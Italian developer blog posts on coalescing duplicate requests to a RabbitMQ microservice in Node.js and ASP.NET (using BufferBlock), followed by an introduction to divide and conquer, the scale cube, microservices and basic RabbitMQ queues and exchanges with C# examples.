    Prima di tornare nel mondo di asp.net, voglio divagare ancora un po'. Si ricorderà che nel microservice scritto in C# è stato inserito un ritardo di cinque secondi per simulare un'elaborazione pesante e/o ritardi di comunicazione. Che cosa accadrebbe se questa pagina è chiamata più volte? Ogni pagina invierà la richiesta al message broker che poi la invierà al microservice che, a sua volta, risponderà percorrendo tutta la strada a ritroso. Poco efficiente: immaginiamo che questa pagina (o questo tipo di richiesta) avvenga spesso! Primo approccio per risolvere: cache. Niente di difficile: quando riceviamo la risposta la salviamo in modo che le successive richieste inviino direttamente la risposta. Ecco il codice (indexCache.js):

    var ch, q; var cacheRequest={}; var cacheResult={}; amqp.connect('amqp://localhost', function(err, conn) { if (err) { console.log("********************"); console.log(err); console.log("Errore nella connessione!"); return; } conn.createChannel(function(err, channel) { ch=channel; ch.assertQueue('', {exclusive: true, autoDelete:true}, function(err, queuex) { q=queuex; ch.consume(q.queue, function(msg) { var guid = msg.properties.correlationId; var stringToRequest = msg.properties.messageId; var objResult = JSON.parse(msg.content.toString()); cacheResult[stringToRequest]=objResult; console.log("From RabbitMQ"); var request = cacheRequest[guid]; cacheRequest[guid] = null; request.end( "Result sum (1+2): "+objResult.Total); }, {noAck: true}); }); }); }); ... app.get('/', function (req, res) { var objToRequest = {Number1:1, Number2:2}; var stringToRequest= JSON.stringify(objToRequest); if (cacheResult[stringToRequest]) { console.log("From cache"); return res.end( "Result sum (1+2): "+cacheResult[stringToRequest].Total); } var guid = uuid.v4(); console.log("********* Request: "+stringToRequest+" id: "+guid); ch.publish('ExchangeIntegerAddition', '', new Buffer(stringToRequest), { messageId: stringToRequest, correlationId: guid, replyTo: q.queue }); cacheRequest[guid]=res; });

    E’ utilizzato un nuovo oggetto cacheResult che salva il contenuto della risposta. Se proviamo ora, solo la prima richiesta avrà una risposta dopo cinque secondi: tutte le successive sono immediate. C'è motivo per essere felici? No, perché cosa avviene tra la prima richiesta e quelle che avvengono fino alla risposta ben cinque secondi dopo? Semplicemente saranno eseguite n richieste fino al salvataggio nella cache della risposta. Semplificando con un grafico:

    E se mettessimo in un buffer le richieste in modo che, appena ricevuta la risposta, la potessimo inviare a tutti i client?

    Ecco che il primo utente fa partire la richiesta effettiva al microservice, se le successive richiedono gli stessi dati, rimane in attesa della risposta della prima richiesta. Con node.js? Ancora tutto facile (indexbatch.js):

    var ch, q; var cacheRequest={}; amqp.connect('amqp://localhost', function(err, conn) { if (err) { console.log("********************"); console.log(err); console.log("Errore nella connessione!"); return; } conn.createChannel(function(err, channel) { ch=channel; ch.assertQueue('', {exclusive: true, autoDelete:true}, function(err, queuex) { q=queuex; ch.consume(q.queue, function(msg) { var stringToRequest = msg.properties.correlationId; var objResult = JSON.parse(msg.content.toString()); console.log("From RabbitMQ"); var requestList = cacheRequest[stringToRequest]; cacheRequest[stringToRequest] = null; requestList.forEach(function(res) { res.end( "Result sum (1+2): "+objResult.Total); }); }, {noAck: true}); }); }); }); app.get('/', function (req, res) { var objToRequest = {Number1:1, Number2:2}; var stringToRequest= JSON.stringify(objToRequest); console.log("********* Request: "+stringToRequest); if (!cacheRequest[stringToRequest]) { console.log("Request new"); cacheRequest[stringToRequest]=[]; ch.publish('ExchangeIntegerAddition', '', new Buffer(stringToRequest), { correlationId: stringToRequest, replyTo: q.queue }); } else { console.log("Request cached"); } cacheRequest[stringToRequest].push(res); });

    In requestList salviamo tutte le richieste "uguali". Quando riceviamo la risposta ecco che inviamo immediatamente le risposte a tutti i client:

    requestList.forEach(function(res) { res.end( "Result sum (1+2): "+objResult.Total); });

    Se apriamo due browser diversi (non valgono tab differenti) e richiediamo la pagina, vedremo, grazie ai messaggi di log nel terminale, che la prima richiesta viene inviata effettivamente al message broker, mentre la seconda chiamata rimane in attesa; l'effettivo funzionamento corretto lo si verifica facilmente vedendo che entrambi i browser si aggiornano contemporaneamente.

    Fine divagazione con node.js. Ora tocca ad asp.net. Facile, replichiamo lo stesso funzionamento: mettiamo in cache le richieste e quando abbiamo la risposta dal message broker le visulizziamo... asp... qualcosa non mi torna... pausa... qualcosa non torna in questo ragionamento... Alla fine mi rendo conto che... NON SI PUO'! Asp.net, almeno basandosi sulle mie conoscenze, non permette una cosa del genere! E che... come risolvo? Ok, la faccio breve... Ricapitoliamo togliendoci dalla testa node.js: asp.net è un'altra cosa. Devo fare in modo che, inviato un messaggio a un message broker alla richiesta di pagina, dobbiamo attendere la risposta perché essa sia visualizzata.

    Non esiste nulla di tutto ciò. Dobbiamo fare qualcosa con ciò che il framework .net ci mette a disposizione. Mi ritorna in mente un oggetto nativo che avevo utilizzato per la distribuzione di una queue tra più thread: BlockingCollection. Questo oggetto nel namespace System.Collection.Concurrent fa parte di una serie di nuovi oggetti creati da Microsoft per l'accesso sicuro a collection in multithreading - i canonici oggetti List<>, Dictionary<> ecc... se utilizzati in multithreading necessitano di lock da parte del programmatore. ConcurrentBag<>, ConcurrentDictionary<> e così via, permettono l'accesso sicuro senza bisogno di lock, e funzionano come i tradizionali oggetti:

    var queue1 = new System.Collections.Generic.Queue(); queue1.Enqueue("stringa"); string value = queue1.Dequeue();

    Questo è la classica queue presente nel Framework .net fin dall'arrivo dei generics nella versione 2.0. Aggiunta una o più stringhe possiamo preleverane una con il classico ordinamento FIFO (first in, first out). Se utilizziamo questo oggetto in un'ambiente multithread si rischiano strana inconsistenza negli oggetti ritornati. Con i nuovi oggetti a prova di "concorrenza" possiamo scrivere in un esempio un pochino più complesso:

    var queueBlocked = new System.Collections.Concurrent.ConcurrentQueue(); queueBlocked.Enqueue("stringa1"); while (true) { string value; if (queueBlocked.TryDequeue(out value)) { Console.WriteLine(value); } else { break; } }

    Ora dobbiamo "provare" a prelevare il valore, in caso positivo possiamo accedere all'oggetto senza problemi altrimenti la queue è vuota e il programma si chiude. A parte questi oggetti basilari, c'è l'oggetto nominato prima: BlockingCollection.

    var queueBlocked = new System.Collections.Concurrent.BlockingCollection(); queueBlocked.Add("stringa1"); while (true) { string value = queueBlocked.Take(); Console.WriteLine(value); }

    Questa volta il ciclo è infinito ma non dobbiamo preoccuparci: appena estratti tutti gli elementi dalla queue il thread si bloccherà in attesa che un secondo thread aggiunga un altro elemento. Questo lo farà senza sprecare cicli macchina o altro: il thread sarà sospeso in attesa della prossima elaborazione. In passato ho utilizzato questo oggetto con profitto per l'elaborazione di elementi da una queue da parte di più thread paralleli senza dovermi preoccupare di lock e altro. Ma la cosa importante ora è che BlockingColleciton mi consente di avere a disposizione una possibile soluzione. Se io passassi a una classe (che invia e attende un messaggio dal message broker) questo oggetto, e ne rimanessi in attesa che venga popolato con la risposta, avrei la mia soluzione valida che mi consentirebbe di scrivere:

    protected void Page_Load(object sender, EventArgs e) { var objToRequest = new AdditionServiceClass { Number1=1, Number2=2 }; var blockedObj = new BlockingCollection(); SendMessage(blockedObj); // <-- example msg.Text = blockedObj.Take().ToString(); // <-- simple example }

    Faccio alcune prove e la cosa funziona, e pure bene: la mia classe, che vedremo dopo, che gestisce i messaggi da inviare e ricevere al message broker, è in grado di mettere in cache le richieste mentre invia solo una richiesta al microservice, e ricevuta la risposta, la invia a tutte le pagine in attesa che visualizzano contemporaneamente la risposta.

    Tutto bene? No, questo oggetto ha un grave difetto da numerosi test che ho fatto anche personalmente: mette in sospensione sì il thread, ma non lo libera per altre richieste come è auspicabile che faccia in una web application in asp.net. E siamo ancora al punto di prima. Ci vorrebbe un oggetto che, come il BlockingCollection sia in grado di bloccare il thread e addirittura sia capace di liberarlo e, perché no, sia compatibile con il nuovo sistema asincrono di asp.net con l'uso di async/await. Senza doverlo ricreare da zero, avevo già cercato in precedenza un oggetto simile e l'ho trovato in una libreria esterna: "AsyncEx"


    L'oggetto in questione è "BufferBlock". Come ConcurrentQueue, possiamo usarlo nello stesso modo:

    BufferBlock bb = new BufferBlock(); string value; try { value = await bb.ReceiveAsync((new CancellationTokenSource(3000)).Token); } catch { value = "Timeout!!!"; }

    Possiamo anche definire il CancellationTokenSource con il timeout: se nel tempo prestabilito non è inserito nessun oggetto, avremo una exception che potremo gestire in modo che una pagina non rimanga in attesa a tempo indeterminato una risposta che non potrebbe mai arrivare.

    Alla fine ce l'abbiamo fatta: abbiamo un oggetto utile allo scopo e possiamo scrivere la nostra pagina:

    <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="TestRabbitMQ.aspx.cs" Inherits="AsyncPageTest.TestRabbitMQ" Async="true" %>
    Message from RabbitMQ:

    E il codice in C#:

    protected async void Page_Load(object sender, EventArgs e) { AdditionServiceClass value; var objToRequest = new AdditionServiceClass { Number1=5, Number2=2 }; try { value = await RabbitUtilityClass.SendRequest(objToRequest); msg.Text = value.Total.ToString(); } catch { msg.Text = "Timeout"; } }

    Il codice è semplicissimo: AddiotionalServiceClass ha tre property dove sono inseriti i due valori numerici da aggiungere e il risultato. Il lavoro più interessante è la classe RabbitUtilityClass. Ecco il codice completo:

    public class RabbitUtilityClass { const string ExchangeName = "ExchangeIntegerAddition"; static ConnectionFactory _connectionFactory; static IConnection _connection; static IModel _modelCentralized; static string _queueName; static ConcurrentDictionary>> _cacheRequest = new ConcurrentDictionary>>(); static JavaScriptSerializer jsonSerializer = new JavaScriptSerializer(); static RabbitUtilityClass() { _connectionFactory = new ConnectionFactory(); _connectionFactory.HostName = "localhost"; _connection = _connectionFactory.CreateConnection(); _modelCentralized = _connection.CreateModel(); var queueResult = RabbitUtilityClass._modelCentralized.QueueDeclare("", false, true, true, null); _queueName = queueResult.QueueName; RabbitUtilityClass._modelCentralized.BasicQos(0, 1, false); QueueingBasicConsumer consumer = new QueueingBasicConsumer(RabbitUtilityClass._modelCentralized); string consumerTag = RabbitUtilityClass._modelCentralized.BasicConsume(_queueName, false, consumer); Task.Run(() => { while (true) { var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue(); string content = Encoding.Default.GetString(e.Body); string messageId = e.BasicProperties.MessageId; string correlationId = e.BasicProperties.CorrelationId; var reply = _cacheRequest[correlationId]; reply.ForEach(t => t.Post(jsonSerializer.Deserialize(content))); _cacheRequest.TryRemove(correlationId, out reply); RabbitUtilityClass._modelCentralized.BasicAck(e.DeliveryTag, false); } }); } public static Task SendRequest(AdditionServiceClass objRequested) { var objJson = jsonSerializer.Serialize(objRequested); var result = new BufferBlock(); if (_cacheRequest.ContainsKey(objJson)) { _cacheRequest[objJson].Add(result); return result.ReceiveAsync((new CancellationTokenSource(30000)).Token); } _cacheRequest[objJson] = new List>(); _cacheRequest[objJson].Add(result); IBasicProperties basicProperties = _modelCentralized.CreateBasicProperties(); basicProperties.MessageId = Guid.NewGuid().ToString(); basicProperties.CorrelationId = objJson; basicProperties.ReplyTo = _queueName; Task.Run(() => { _modelCentralized.BasicPublish(ExchangeName, "", basicProperties, Encoding.Default.GetBytes(objJson)); }); return result.ReceiveAsync((new CancellationTokenSource(30000)).Token); } }

    Gran parte del codice è per la creazione del collegamento con il nostro message broker (RabbitMQ in tutti questi esempi).

    SendRequest è la funzione che abbiamo chiamato dalla nostra pagina asp.net che controlla che la richiesta è già stata inviata, in questo caso sarà ritornato un oggetto Task con la nostra risposta con il metodo ReceiveAsync di BufferBlock. Questo sarà utilizzato per bloccare la richiesta e sarà salvato in una collection utilizzata per inviare la risposta quando RabbitMQ ce la invierà.

    L'istanza di classe statica "RabbitUtilityClass" crea la queue privata per l'attesa della risposta e rimane in attesa di eventuali messaggi. Come nell'esempio con la tecnologia node.js sono utilizzati le property del messaggio per riconoscere la chiamata e per popolare gli oggetti BufferBlock corretti che sbloccheranno le pagine che ne hanno fatto richiesta. Il codice appare più complesso di quello con node.js, ma fa il suo lavoro (si potrebbe migliorare ancora, come con l'aggiunta di messaggi di errore con dettagli utilizzabili).

    A questo link trovate il codice sorgente.

    Questa volta sono stato più breve.


    Continua a leggere ASP.NET e RabbitMQ (con un po' di Node.js).

    (C) 2017 ASPItalia.com Network - All rights reserved

              Divide et impera con c# e un message broker   

    Questo lo voglio condividere. Qualche tempo fa si discuteva sul semplice paradigma informatico divide et impera e il suo approccio reale. Di base non si basa su niente di difficile: avendo un compito X per risolverlo lo si suddivide in compiti più piccoli, e questi in più piccoli ancora e così via, in modo ricorsivo. Un esempio reale che usa questo paradigma è il famoso quicksort che, preso un valore medio, detto pivot, al primo passaggio suddivide gli elementi dell'array da ordinare a sinistra se più piccoli del pivot, a destra se più grandi. Dopodiché, questi due sotto array, sono ancora suddivisi, il primo con un suo valore medio, il secondo con un altro valore medio; quindi si ricomincia a la suddivisione spostando gli elementi da una parte all'altra a seconda del valore del pivot: alla fine di questo passaggio saranno quattro gli array. Se l'ordinamento non è completo, si dividono ancora questi quattro array in otto più piccoli, ognuno con il suo pivot medio e con il dovuto spostamento da una parte o dall'altra... così fino a quando l'array è ordinato (maggiori info alla pagina di wikipedia dove è presente anche in modo grafico tale algoritmo). Prendendo il codice di esempio dalla pagina di Wikipedia, posso costruire la versione in C#:

    static List QuickSortSync(List toOrder) { if (toOrder.Count <= 1) { return toOrder; } int pivot_index = toOrder.Count / 2; int pivot_value = toOrder[pivot_index]; var less = new List(); var greater = new List(); for (int i = 0; i < toOrder.Count; i++) { if (i == pivot_index) { continue; } if (toOrder < pivot_value) { less.Add(toOrder); } else { greater.Add(toOrder); } } var lessOrdered = QuickSortSync(less); var greaterOrdered = QuickSortSync(greater); var result = new List(); result.AddRange(lessOrdered); result.Add(pivot_value); result.AddRange(greaterOrdered); return result; }

    Anche se non è ottimizzata, non importa per lo scopo finale di questo post: il suo sporco lavoro lo fa ed è quanto basta. Eseguito, si potrà vedere l'array di numeri interi prima e dopo l'ordinamento:

    Per migliorare tale versione potremmo utilizzare chiamate asincrone e più thread: in fondo già la prima suddivisione prima spiegata con due parole, che ritorna due array, può essere elaborata con due thread separati, ognuno che elabora il suo sotto-array. E alla divisione successiva, potremo utilizzare altri thread. Avendo a disposizione un microprocessore con più core, avremo immediatamente vantaggi prestazionali non indifferenti se confrontati con la versione mono-thread prima esposta. Per un approccio multithread ho parlato già in modo esteso in questo mio altro post, e in questo portale potete trovare molte altre informazioni. Ovviamente sempre la cura per ogni male la possibilità di utilizzare tutti i core della propria macchina e una moltitudine di thread paralleli. Ma fino a quando si può estendere oltre questi limiti? I thread non sono infiniti così come i core di una cpu. Spesso alcuni novizi - lasciatemi passare tale termine - pensano che l'elaborazione parallela sia la panacea per tutti i problemi. Ho molte operazioni da svolgere in parallelo, come posso risolverle da programmazione? Semplice, una marea di thread paralleli - e prima del Framework.Net 4 e dei suoi Task e dell'async/await del Framework 4.5 - sembrava una delle tecniche più facili da utilizzare e forse anche più abusate. Alla prima lettura, spesso il neofito, alla seguente domanda sbaglia:

    Ipotizzando di avere una cpu monocore (per semplificare), e dovendo eseguire N operazioni un nostro programma ci mette esattamente 40 secondi. Se questo programma lo modificassi per potere usare 4 thread paralleli, quanto tempo ci metterebbe questa volta ad eseguire tutta la mole di calcoli?

    Se si risponde in modo affrettato, si potrebbe dire 10 secondi. Se sapete come funziona una cpu e i suoi core e non vi siete fatti ingannare dalla domanda, avrete risposto nel modo corretto: ~40 secondi! La potenza di calcolo di una cpu è sempre quella e non è suddividendola in più thread che si ottengono miracoli. Solo con 4 core avremo l'elaborazione conclusa in 10 secondi.

    Ma perché questa divagazione? Perché se dovessimo estendere il paradigma Divede et impera ulteriormente al programmino di ordinamento qui sopra perché potesse superare, teoricamente, le limitazioni della macchina (cpu e memoria), quale strada si potrebbe - ripeto - si potrebbe intraprendere? La soluzione è facilmente intuibile: aggiungiamo un'altra macchina per la suddivisione di questo processo; non basta ancora? Possiamo aggiungere tutte le macchine e la potenza necessaria per l'elaborazione.

    Per risolvere questi tipi di problemi e per poter poi avere la possibilità di estendere in modo pressoché infinito un progetto, la suddivisione di un nostro processo in microservice è una delle soluzioni più gettonate, così come conoscere il famoso scale cube di Martin L. Abbott e Michael T. Fisher.

    Mettendo da parte il programmino prima scritto per il sort ed estendendo il disco ad applicativi di un certo peso, possiamo definire una piccola web application che funge da blog: visualizzazione dell'elenco dei post, il singolo dettaglio, un'eventuale ricerca e l'utilizzo dei tag. Di base, avremo un database dove salvare i post, quindi una web application con i classici 3 layer per la presentazione, la business logic e il layer per il recupero dei dati. Questo tipo di applicazione, nel cubo, starebbe nel vertice in basso a sinistra. Si tratta di una applicazione monolitica, dove tutte le funzioni sono racchiuse all'interno di un singolo processo. Se volessimo spostarci lungo l'asse X, dovremmo duplicare questa web application su più processi e server. I vantaggi sarebbero subito evidenti: in caso questa applicazione avesse successo e le dotazioni hardware della macchina su cui gira non fossero più sufficienti, l'installazione dello stesso su più server risolverebbe l'aumento di carico di lavoro (tralasciando il potenziamento del database). L'asse Y del cubo è quello più interessante: con esso spostiamo le varie funzioni della web application in piccoli moduli indipendenti. Sempre tenendo come esempio il blog, potremmo usare il layer di presentazione sul web server, ma i layer della busines logic suddividerla in più moduli indipendenti; il primo layer, in questo modo, interrogherà questo modulo o altri per richiedere la lista di post e, appena ricevuta la risposta, ritornerà al client i dati richiesti. Solo per questo punto si può notare un notevole vantaggio: in un mondo informatico sempre più votato all'event driver e all'asincrono - basti notare il notevole successo di Node.js verso cui si stanno spostando pressoché tutti in modo più o meno semplificato, async/await fa parte ormai della quotidianità del programmatore .net - dove nulla dev'essere sprecato e nessun thread deve rimanere in attesa, questo approccio permette il carico ottimale dei server. Sono in vena di quiz, cosa c'è di "sbagliato" (notare le virgolette) nel codice seguente (in c#)?

    var posts = BizEntity.GetPostList(); var tags = BizEntity.GetTagList();

    Cavolo, sono due righe di codice, che cosa potrebbero avere mai di sbagliato? Ipoteticamente la prima prende dal database la lista dei post di un blog, mentre la seconda la lista dei tag (questo codice potrebbe essere utile per la web application vista prima). La prima lista è usata per visualizzare il lungo elenco di post del nostro blog, la seconda lista per mostrare i tag utilizzati. Se avete spostato ormai la vostra mentalità nella programmazione del vostro codice in modo asincrono o se usate node.js, avrete già capito che cosa c'è di sbagliato in queste due righe di codice: semplicemente esegue due richieste in modo sequenziale! Il thread arriva alla prima riga di codice e qui rimane bloccato in attesa della risposta del database; avuta la risposta, esegue una seconda richiesta e rimane ancora in attesa. Piuttosto, perché non lanciare entrambe le richieste in parallelo e liberare il thread in attesa della risposta? In C#:

    var taskPost = BizEntity.GetPostListAsync(); var taskTag = BizEntity.GetTagListAsync(); Task.WaitAll(new Task[] {taskPost, taskTag}); var posts = taskPost.Result; var tags = taskTag.Result;

    Ottimo, questo è quello che volevamo: esecuzione parallela e thread liberi per processare altre richieste.

    Ritorniamo all'esempio del blog: ipotizziamo a questo punto di voler aggiungere la possibilità di commentare i vari post del nostro blog. Nel caso dell'applicazione monolitica all'inizio esposta, dovremo mettere mano al codice dell'intero progetto, mentre con la suddivisione in moduli indipendenti più piccoli, appunto microservice, dovremo scrivere un modulo indipendente da installare su uno o più server (si ricordi l'asse X), quindi collegare gli altri moduli che richiedono questi dati. Infine l'asse Z si ha una nuova differenziazione, possiamo partizionare i dati e le funzioni in modo che le richieste possano essere suddivise, per esempio, per l'anno o il mese di uscita del post, o se fanno parte di certe categorie e così via... Non si penserà che tutte le pagine archiviate e su cui fa la ricerca Google, sono su un solo server replicato, vero?

    Spiegato in teoria il famoso scale cube (con i miei limiti), non ci rimane che rispondere all'ultima domanda: chi è il collante tra tutti questi micro service? Il framework.net mette a disposizione una buona tecnologia per permettere la comunicazione tra processi che siano sulla stessa macchina o su una batteria di server in una farm factory, o che siano in remoto e comunichino con internet. Utilizzando WCF si può passare facilmente tra i web service WSDL standard a comunicazioni più veloci via tcp e così via. Questo approccio ci pone di fronte ad un evidente limite essendo queste comunicazioni dirette: ipotizzando di avere una macchina con il layer di presentazione del blog, per richiedere i post al microservice che gira su un secondo server, deve sapere innanzitutto DOVE si trova (ip address) e COME comunicare con esso. Risolto questo problema in modo semplice (salvando nel web.config, per esempio, l'ip della seconda macchina e usando un'interfaccia comune per la comunicazione) ci troviamo di fronte immediatamente ad un altro problema: come possiamo spostarci lungo l'asse X del cubo inserendo altre macchine con lo stesso microservice in modo che le richieste vengano bilanciate automaticamente? Dovremo fare in modo che il chiamante sia aggiornato continuamente sul numero di macchine con il servizio di cui ha bisogno, con eventuali notifiche di anomalie volute o no: manutenzione del server con la messa offline del servizio, oppure una rottura improvvisa della macchina. Per l'esempio qui sopra, il layer di presentazione dovrebbe avere al suo interno anche la logica di gestione di tutto questo... e così ogni microservice della nostra applicazione... Assolutamente troppo complicato e ingestibile. Perché dunque non delegare questo compito ad un componente esterno come un message broker?

    Azure mette a disposizione il suo Microsoft Azure Service Bus, molto efficiente e ottimale nel caso di utilizzo del cloud di Microsoft; nel mio caso le mie preferenze vanno per RabbitMQ, anche perché è l'unico su cui ho lavorato in modo approfondito. Innanzitutto RabbitMQ è un message broker open source completo che permette ogni tipo di protocollo (da AMPQ https://en.wikipedia.org/wiki/Advanced_Message_Queuing_Protocol a STOMP https://en.wikipedia.org/wiki/Streaming_Text_Oriented_Messaging_Protocol) e, soprattutto, possiede client per quasi tutte le tecnologie, dal framework .net, passando per Java, per nodejs e così via. Inoltre è possibile installarlo come server sui sistemi operativi principali: Windows, Linux ad Apple. Se per fare delle prove non si vuole installare nulla sulla propria macchina di sviluppo ci si può affidare ad alcuni servizi gratuiti (e limitati) disponibili in internet. Attualmente CloudAMPQ (https://www.cloudamqp.com/) mette a disposizione tra i pacchetti anche la versione free con un limite di 1.000.000 di messaggi al mese):

    Per esigenze di altissimo livello sono disponibili anche piani da centinaia di migliaia di messaggi al secondo in cluster, ma per dei semplici test va più che bene la versione free. Una volta registrati si avrà a disposizione un servizio RabbitMQ completo con tutti i parametri di accesso anche via API Rest sia da classica pagina web:

    (User e password non sono reali in questo caso.)

    Cliccando sul pulsante arancio "RabbitMQ management interface", si avrà a disposizione il pannello di controllo completo per eventuali configurazioni, come la creazione di code (Queue) e delle exchange (eventuali perché il tutto è possibile anche da codice):

    Se non si vuole usare un servizio pubblico si può scaricare direttamente dal sito di RabbitMQ la versione adatta al proprio sistema operativo:


    Per la versione Windows ho riscontrato in tutte le occasioni che l'ho dovuto installare un problema di avvio del servizio. Per verificare che tutto funzioni è sufficiente andare nel menu start e, dopo aver selezionato la voce: "RabbitMQ Command Prompt", scrivere il comando:

    rabbitmqctl.bat status

    Se la risposta è un lungo JSON vuol dire che è tutto corretto, altrimenti si noteranno errori di avvio del nodo di RabbitMQ e roba simile. In questi casi il primo passo è controllare il contenuto dei cookie creati da Erlang (da installare insieme a RabbitMQ), il primo è nel path:


    Il secondo:


    Se sono uguali e il problema sussiste, da terminale precedente avviato in modalità amministratore, avviare questi tre comandi di seguito:

    rabbitmq-service remove rabbitmq-service install net start rabbitmq

    Se anche questo non funziona, non resta che affidarsi a San Google. Se vogliamo che nella versione installata in locale sia disponibile l'interfaccia web, si devono utilizzare questi comandi:

    rabbitmq-plugins enable rabbitmq_management rabbitmqctl stop rabbitmq-service start

    Ora sarà possibile aprire un browser e aprire l'interfaccia web con:


    Username: guest, password: guest.

    Ora, sia che si sia utilizzato un servizio free in internet, sia che si sia installato il tutto sulla propria macchina, per una semplice prova si può andare nel tab Queues e creare una nuova Queue su cui si potranno inserire e leggere messaggi direttamente da questa interfaccia. Ok, ma cosa sono le code e le exchange? In rabbitMQ (e in qualsiasi altro broker message) ci sono tre componenti principali:

    • L'exchange che riceve i messaggi e li indirizza a una coda (queue); questo componente è facoltativo.
    • Queue, è la coda vera e propria dove sono salvati i messaggi.
    • Il binding che lega una exchange a una coda.

    Come detto prima, creando una coda, poi è possibile inserire e leggere i messaggi inseriti da codice. Tutto qua. Niente di complicato. Una coda può avere più proprietà, le principali:

    • Durata: possiamo fare in modo che RabbitMQ salvi i messaggi sul disco, in modo che, in caso di riavvio della macchina, la coda eventualmente in attesa di elaborazione non vada persa.
    • Auto cancellazione: è possibile fare in modo che una coda, appena tutte le connessioni collegate sono chiuse, venga automaticamente cancellata.
    • Privata: una coda accetta come lettore della coda un solo processo; ma chiunque può aggiungere elementi al suo interno.

    Come scritto sopra, da codice possiamo connetterci direttamente con una coda, inviare messaggi e altri processi prelevarli ed eventualmente elaborarli. La vera forza dei message broker non si ferma qui ovviamente. L'uso dell'exchange ci permette di scrivere regole per la consegna del messaggi nelle code collegate dal relativo binding. Abbiamo a disposizione tre modi di invio con l'exchenge:

    • Direct: inserendo la routing key diretta il nostro messaggio sarà inviato a quella e solo quella coda collegata all'exchange con quel binding come nella figura sottostante:
    • Topic: è possibile inserire dei caratteri jolly nella definizione della routing key in modo che un messaggio sia inviato a una o più code che rispettano questo topic. Semplice esempio: un exchange può essere collegato a più queue; nel caso fossero due, prima con entrambe la routing key: #.message, inviando un messaggio in modalità topic con una di queste routing key: a1.message, qwerty.message, entrambe le code riceverebbero il messaggio.
    • Header exchange: invece della routing key vengono controllati i campi header del messaggio.
    • Fanout: tutte le code collegate ricevono il messaggio.

    Un altro dettaglio da non sottovalutare nell'utilizzo dei message broker è la sicurezza della consegna e della ricezione dei messaggi. Se un log perso può essere di minore importanza e sopportabile (causa il riavvio della macchina o una qualsiasi causa esterna), la perdita di una transazione per una prenotazione o pagamento comporta gravi problemi. RabbitMQ supporta l'acknowledgement message: in questo modo RabbitMQ invia il messaggio a un nostro processo che lo elabora, ma non lo cancella dalla coda finoaché il processo non gli invia un comando per la cancellazione. Se, durante, questo processo muore e cade la connessione tra lui e il message broker, questo messaggio sarà inviato al prossimo processo disponibile.

    Per fare una semplice prova da interfaccia, andando nella sezione "Queues" e creiamo una nuova coda dal nome "TestQueue":

    Cliccando su "Add queue" la nostra nuova coda apparirà nella lista della pagina. Si possono anche modificare la durata e le altre proprietà della queue prima citate, ma si può lasciare tutto così com'è e andare avanti. Creiamo ora una exchange dalla sezione "Exchanges" dal nome "ExchangeTest" e il type in "Direct":

    E ora colleghiamo l'exchange e la queue prima creata. Nella tabella della stessa pagina si noterà che è apparsa la nostra Exchange. Cliccandoci sopra abbiamo ora la possibilità di definire in binding:

    Se è tutto corretto, vedremo una nuova immagine che mostra il collegamento.

    Ora nella stessa pagina aprire la sezione "Publish message" e inserire la routing key prima definita e del testo di prova. Quindi cliccare su "Publish message":

    Se tutto è andato bene, apparirà un messaggio su sfondo verde che avvisa che il messaggio è stato inviato alla queue correttamente. Per verificare andare nella sezione "Queues" e si vedrà che ora la coda avrà un messaggio:

    Andando nella parte inferiore della pagina in "Get Message" sarà possibile leggere e cancellare il messaggio.

    Ok, tutto semplice e bello... ma se volessi farlo da codice? Di base il modo di comunicazione più semplice è la one-way. In questo caso un processo invierà un messaggio ad una queue e un altro processo leggerà tale messaggio (nel progetto in allegato sono i progetti Test1A e Test1B). Innanzitutto è necessario aggiungere il reference alla libreria RabbitMQ.Client, disponibile in Nuget. Quindi ecco il codice che aspetta i messaggi alla queue (il codice crea automaticamente la queue Example1 e nella soluzione il cui link si trova a fine di questo post, ha come nome Example1A il progetto), innanzitutto il codice per la lettura e svuotamento della coda:

    const string QueueName = "Example1"; static void Main(string[] args) { var connectionFactory = new ConnectionFactory(); connectionFactory.HostName = "localhost"; using (var Connection = connectionFactory.CreateConnection()) { var ModelCentralized = Connection.CreateModel(); ModelCentralized.QueueDeclare(QueueName, false, true, false, null); QueueingBasicConsumer consumer = new QueueingBasicConsumer(ModelCentralized); string consumerTag = ModelCentralized.BasicConsume(QueueName, true, consumer); Console.WriteLine("Wait incoming message..."); while (true) { var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue(); string content = Encoding.Default.GetString(e.Body); Console.WriteLine("> {0}", content); if (content == "10") { break; } } } }

    ConnectionFactory ci permette di creare la connessione al nostro server di RabbitMQ (in questo esempio con localhost, l'username e password guest sono utilizzate automaticamente). In questo caso in ModelCentralized è specificato il nome della queue, i tre valori boolean successivi servono per specificare se essa è durable (i messaggi sono salvati su disco e recuperati in caso di riavvio), exclusive (solo chi crea la queue può leggerne il contenuto) e autoDelete (la queue si cancella quando anche l'ultima connessione ad essa viene chiusa). Alla fine l'oggetto consumer con la funzione Dequeue interrompe il thread del processo e rimane in attesa del contenuto della queue; all'arrivo del primo messaggio ne prende il contenuto (questa dll per il framework.net ritorna un array di byte) e trasformato in stringa lo visualizza a schermo.

    Il codice per l'invio (Example1B):

    // Tralasciato il codice uguale all'esempio precedente // fino all'istanza di ModelCentralized: var ModelCentralized = Connection.CreateModel(); Console.WriteLine("Send messages..."); IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties(); byte[] msgRaw; for (int i = 0; i < 11; i++) { msgRaw = Encoding.Default.GetBytes(i.ToString()); ModelCentralized.BasicPublish("", QueueName, basicProperties, msgRaw); } } Console.Write("Enter to exit... "); Console.ReadLine(); }

    Il resto del codice sono istanze ad oggetti necessari all'invio dei messaggi (senza impostare alcune proprietà particolare) e trasformato il nostro messaggio in un array di bytes, grazie alla funzione BasicPublish viene inviato effettivamente alla queue QueueName (il primo parametro con una stringa vuota, è il nome dell'eventuale exchange utilizzato; in questo caso inviando il messaggio direttamente alla queue non c'è bisogno dell'exchange). Il codice invia una sequenza di numeri alla coda, e se dopo l'avvio si controlla nell'applicazione web prima vista, si vedrà che la queue "Example1" contiene 11 messaggi.

    Il risultato:

    Introduciamo l'uso dell'exchange con l'invio dei messaggi con una queue privata. Inoltre impostiamo la coda in modo che siamo noi a inviare l'acknowledgement message. Il codice si complica di poco per la console application in attesa dei messaggi (Example2A).

